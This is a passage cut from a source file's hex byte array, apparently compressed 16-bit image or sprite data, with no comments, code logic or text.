	0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x2B, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0x2B, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x4B, 0x12, 
	0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 
	0xEA, 0x11, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x4C, 0x12, 0x0B, 0x12, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0x0B, 0x12, 
	0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x08, 0x85, 0x2B, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 
	0x2B, 0x12, 0x0E, 0x8A, 0xAD, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 
	0xEA, 0x11, 0xEA, 0x11, 0xEA, 0x11, 0xEA, 0x11, 0x0E, 0x8D, 0x6D, 0x12, 0x6D, 0x12, 0x2B, 0x12, 
	0x0A, 0x12, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0xEA, 0x11, 0x0A, 0x12, 
	0x2B, 0x12, 0x4B, 0x12, 0x0E, 0x80, 0x10, 0xEA, 0x11, 0x0A, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 
	0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0A, 0x12, 0xEA, 0x11, 0xEA, 0x11, 0x2B, 0x12, 0x6C, 0x12, 0xAD, 
	0x12, 0xAE, 0x12, 0x6D, 0x12, 0x2B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xEA, 
	0x11, 0xEA, 0x11, 0xEA, 0x11, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0x2B, 0x12, 0x4B, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 
	0x11, 0xEA, 0x11, 0x0A, 0x12, 0x0B, 0x12, 0x0C, 0x9B, 0x6D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x2B, 
	0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4B, 
	0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xAD, 0x12, 0x4C, 
	0x12, 0x0B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0x0A, 0x12, 0x0A, 0x12, 0x0A, 0x12, 0x0D, 
	0x9B, 0x2B, 0x12, 0x4B, 0x12, 0x4B, 0x12, 0xEA, 0x11, 0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 
	0x11, 0xE9, 0x11, 0x0A, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0x8D, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x6C, 0x12, 0x4B, 0x12, 0x0B, 0x9F, 0x4B, 0x12, 0x6C, 0x12, 0xAD, 0x12, 0xCE, 
	0x1A, 0xAE, 0x12, 0x6D, 0x12, 0x2B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0x2B, 0x12, 0x2B, 
	0x12, 0x2B, 0x12, 0x0A, 0x12, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 
	0x12, 0x2B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0x06, 0x90, 0x0B, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0x2B, 
	0x12, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0x0A, 
	0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x6B, 0x0B, 0x12, 0x86, 0x2B, 0x12, 0x4C, 
	0x12, 0x6D, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x14, 0x83, 0x4B, 0x12, 0x4B, 0x12, 0x4B, 
	0x12, 0x06, 0x80, 0x03, 0x0B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0x0B, 0x12, 
	0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x2B, 0x12, 
	0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 
	0x2B, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x6C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x07, 0x92, 0x2B, 0x12, 0x2B, 0x12, 
	0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0xEA, 0x11, 
	0x08, 0x88, 0xEA, 0x11, 0xEA, 0x11, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x6D, 0x12, 
	0x6C, 0x12, 0x68, 0x4C, 0x12, 0x0A, 0x80, 0x03, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0xE9, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 
	0x4B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 
	0x4B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x6D, 0x12, 
	0x2B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0x0A, 0x12, 0x09, 0x97, 
	0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x0B, 0x12, 
	0x0B, 0x12, 0x0B, 0x12, 0x0A, 0x12, 0xEA, 0x11, 0xEA, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0xEA, 0x11, 
	0x0A, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x07, 0x80, 
	0x19, 0x4C, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0B, 
	0x12, 0x0A, 0x12, 0x0A, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4B, 0x12, 0x6D, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xAD, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0xE9, 0x11, 0xE9, 
	0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0xE9, 
	0x11, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 
	0x12, 0x8D, 0x12, 0x08, 0x93, 0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x2B, 
	0x12, 0x2B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x6D, 
	0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xAE, 0x12, 0x6D, 0x12, 0x2B, 0x12, 0x06, 0x8A, 0x4C, 0x12, 0x6C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAD, 
	0x12, 0x1A, 0x80, 0x1B, 0x0B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x4C, 0x12, 
	0x4B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 
	0x6C, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xCF, 0x1A, 0x8D, 0x12, 0x4C, 0x12, 
	0x0A, 0x12, 0xEA, 0x11, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x4C, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAD, 0x12, 0x6C, 0x12, 
	0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 
	0x0A, 0x12, 0xEA, 0x11, 0xEA, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0xEA, 0x11, 0x0A, 0x12, 0x0B, 0x12, 
	0x0B, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x08, 0x84, 0xAD, 0x12, 0x6C, 0x12, 
	0x4B, 0x12, 0x2B, 0x12, 0x06, 0x80, 0x33, 0x4B, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x8D, 
	0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xAD, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 
	0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0xE9, 
	0x11, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 
	0x12, 0x6D, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 
	0x12, 0x4C, 0x12, 0x6C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 
	0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x6C, 
	0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xAE, 0x12, 0x6D, 0x12, 0x2B, 0x12, 0xEA, 0x11, 0x0B, 0x12, 0x4B, 
	0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x06, 0x80, 0x17, 
	0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0xE9, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6D, 0x12, 
	0x8D, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCE, 0x1A, 0x8D, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x08, 0x90, 
	0x6D, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 
	0x69, 0x8D, 0x12, 0x9E, 0x6D, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x6D, 0x12, 
	0x6C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 
	0xCF, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xCF, 0x1A, 
	0x07, 0x92, 0xCE, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCE, 0x1A, 
	0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 
	0x6C, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0x6A, 0xAE, 0x12, 0x80, 0x16, 0xAD, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xCE, 0x1A, 0xAD, 
	0x12, 0x6D, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0xAE, 
	0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 
	0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 
	0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xCA, 0x41, 0x08, 0x9B, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 
	0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 
	0x1A, 0x75, 0xEF, 0x1A, 0x85, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0x75, 
	0xEF, 0x1A, 0x84, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xF3, 0x8F, 0x01, 0xEF, 0x1A, 
	0x84, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0x51, 0x1F, 0x02, 0x00, 0x1B, 0xF9, 0x2C, 
	0x15, 0x03, 0x03, 0x03, 0x22, 0x0C, 0x05, 0x40, 0x29, 0x43, 0x04, 0xFF, 0xFF, 0xC0, 0x14, 0xEF, 
	0x1A, 0x18, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0xC6, 0x01, 0x84, 0xCF, 
	0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xD0, 0x3A, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x86, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 
	0xD0, 0x34, 0x21, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x87, 0xAE, 0x12, 0xCF, 0x1A, 
	0xCF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0xD0, 0x38, 0xE1, 0x00, 0x03, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9C, 0x8D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0x8D, 
	0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 
	0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0x00, 
	0x04, 0x9D, 0x4C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 
	0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0x00, 0x03, 0x9D, 0x4B, 
	0x12, 0x4B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAD, 
	0x12, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xAD, 
	0x12, 0xAD, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0x6D, 
	0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0x00, 0x03, 0x8C, 0x0B, 0x12, 0x0A, 0x12, 
	0xEA, 0x11, 0x0A, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0x8D, 0x12, 0xD0, 0x34, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x89, 
	0xEA, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 
	0xAD, 0x12, 0xD0, 0x35, 0x23, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9D, 0x2B, 0x12, 
	0xEA, 0x11, 0xE9, 0x11, 0xEA, 0x11, 0x2B, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 
	0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0x00, 0x03, 0x9C, 0x4B, 0x12, 0x0B, 0x12, 0xEA, 
	0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 
	0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 
	0x1A, 0xCF, 0x1A, 0x68, 0xEF, 0x1A, 0x1D, 0x81, 0x2B, 0x12, 0x09, 0x81, 0xCF, 0x1A, 0x78, 0xEF, 
	0x1A, 0x00, 0x05, 0x82, 0xAE, 0x12, 0xCE, 0x1A, 0x79, 0xEF, 0x1A, 0x00, 0x04, 0x82, 0xAD, 0x12, 
	0xAE, 0x12, 0xD0, 0x36, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x4B, 0x12, 
	0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0xD0, 0x3A, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x85, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0xD0, 0x3A, 0x01, 
	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8A, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xD0, 0x3D, 
	0x61, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD7, 0x20, 0x00, 0x09, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x89, 0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x47, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x87, 
	0x6D, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0xD7, 0x01, 
	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 
	0x12, 0x0B, 0x12, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0xD0, 0x3E, 0x20, 0x00, 0x01, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x4B, 0x12, 0x6D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0x79, 0xEF, 
	0x1A, 0x1C, 0x89, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x4B, 
	0x12, 0x6D, 0x12, 0xAE, 0x12, 0x7B, 0xEF, 0x1A, 0x1F, 0x84, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 
	0x6C, 0x12, 0xD0, 0x3C, 0xE0, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x84, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xD7, 0x60, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xC7, 0x23, 0x00, 0x81, 0xCE, 0x1A, 0xD7, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x60, 0x04, 0xEF, 0x1A, 0xF0, 0xD8, 0x01, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x51, 0x0A, 0x40, 0xE4, 0x36, 0x01, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x03, 
	0x39, 0x0A, 0x22, 0x0C, 0x05, 0x40, 0x1F, 0x4A, 0x3A, 0xFF, 0xFF, 0x02, 0xF4, 0x5E, 0x01, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 
	0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 
	0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xCF, 
	0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0x00, 0x00, 0x00, 0x00, 0xEF, 
